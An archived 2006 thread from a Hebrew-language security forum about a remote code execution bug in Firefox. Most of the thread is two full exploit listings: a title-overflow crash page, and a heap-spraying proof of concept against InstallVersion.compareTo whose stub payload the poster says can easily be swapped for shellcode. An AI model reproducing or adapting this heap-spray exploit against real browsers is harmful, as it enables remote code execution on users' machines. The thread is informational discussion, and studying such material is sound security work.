Logo

רד-בורד: ארכיון

ראשי > אבטחת מידע > Mozilla Firefox Remote Command Execution(0days)

02/01/2006 09:14:38 Inj3ction_Boy
באג חדש שהתגלה במוזילה פיירפוקס מאפשר שליטה מרחוק
http://www.frsirt.com/exploits/20060101.mozilla_compareto.pm.php
עוד לא נבנה פאץ’
02/01/2006 16:45:09 cp77fk4r
לפני כמה ימים דיווחת פה כבר על הבאג הזה (http://www.red-board.co.il/forum/topic.asp?tid=21275)

זה אותו הבאג שZIPL0CK מצא, רק דרך ניצול טיפה שונה, הOverFlow בקובץ היסטוריה זהה לחלוטין.

זה הדרך ניצול של ZIPL0CE:
קוד:
<html><head><title>heh</title><script type="text/javascript">
function ex() {
var buffer = "";
for (var i = 0; i < 5000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 500; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}
</script></head><body>ZIPLOCK says ]url=javascript:ex();">CLICK ME
[/url[</body></html>

(Coded by ZIPL0CE)

בטקסט שZIPL0CE שלח לmilw0rm הוא ציין שבעזרת שינוים קלים אפשר גם להריץ קודים.

(ערכתי טיפה את הקוד בכדי שיתאים להצגת הודעות כאן)

בקוד של SkyLined ושל AvivRaff:

קוד:
<html>
<head>
<!--
Copyright (C) 2005-2006 Aviv Raff
From: http://aviv.raffon.net/2005/12/11/MozillaUnderestimateVulnerabilityYetAgainPlusOldVulnerabilityNewExploit.aspx
Greets: SkyLined, The Insider and shutdown
-->
<title>Mozilla (Firefox<=v1.04) InstallVersion->compareTo Remote Code Execution Exploit</title>
<script language="javascript">

function BodyOnLoad()
{
location.href="javascript:void (new InstallVersion());";
CrashAndBurn();
};

// The "Heap Spraying" is based on SkyLined InternetExploiter2 methodology
function CrashAndBurn()
{
// Spray up to this address
var heapSprayToAddress=0x12000000;

// Payload - Just return..
var payLoadCode=unescape("%u9090%u90C3");

// Size of the heap blocks
var heapBlockSize=0x400000;

// Size of the payload in bytes
var payLoadSize=payLoadCode.length * 2;

// Caluclate spray slides size
var spraySlideSize=heapBlockSize-(payLoadSize+0x38); // exclude header

// Set first spray slide ("pdata") with "pvtbl" fake address - 0x11C0002C
var spraySlide1 = unescape("%u002C%u11C0");
//var spraySlide1 = unescape("%u7070%u7070"); // For testing
spraySlide1 = getSpraySlide(spraySlide1,spraySlideSize);

var spraySlide2 = unescape("%u002C%u1200"); //0x1200002C
//var spraySlide2 = unescape("%u8080%u8080"); // For testing
spraySlide2 = getSpraySlide(spraySlide2,spraySlideSize);

var spraySlide3 = unescape("%u9090%u9090");
spraySlide3 = getSpraySlide(spraySlide3,spraySlideSize);

// Spray the heap
heapBlocks=(heapSprayToAddress-0x400000)/heapBlockSize;
//alert(spraySlide2.length); return;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory=(i%3==0) ? spraySlide1 + payLoadCode:
(i%3==1) ? spraySlide2 + payLoadCode: spraySlide3 + payLoadCode;
}

// Set address to fake "pdata".
var eaxAddress = 0x1180002C;
// This was taken from shutdown’s PoC in bugzilla
// struct vtbl { void (*code)(void); };
// struct data { struct vtbl *pvtbl; };
//
// struct data *pdata = (struct data *)(xxAddress & ~0x01);
// pdata->pvtbl->code(pdata);
//
(new InstallVersion).compareTo(new Number(eaxAddress >> 1));
}

function getSpraySlide(spraySlide, spraySlideSize) {
while (spraySlide.length*2<spraySlideSize)
{
spraySlide+=spraySlide;
}
spraySlide=spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}

// -->
</script>
</head>
<body onload="BodyOnLoad()">
</body>
</html>



יש את דרך הניצול של ההרצת קודים.

הקוד הזה שהבאתי הוא רק PoC, ולכן הוא רק מחזיר ערכים ריקים, אבל לפי דברי אביב, בקלות אפשר לשנות את זה לזה שהוא יחזיר איזה Shellcode.

בקיצור, דרך הניצול של InstallVersion.compareTo() תהיה דומה גם אחרי הלבשת הShellcode, ולכן אין פה איזה חידוש או משהו, וזה כל מה שרציתי להגיד בהודעה הזאת.
[ההודעה נערכה על-ידי cp77fk4r ב-02/01/2006 16:52:53]
עמודים: 1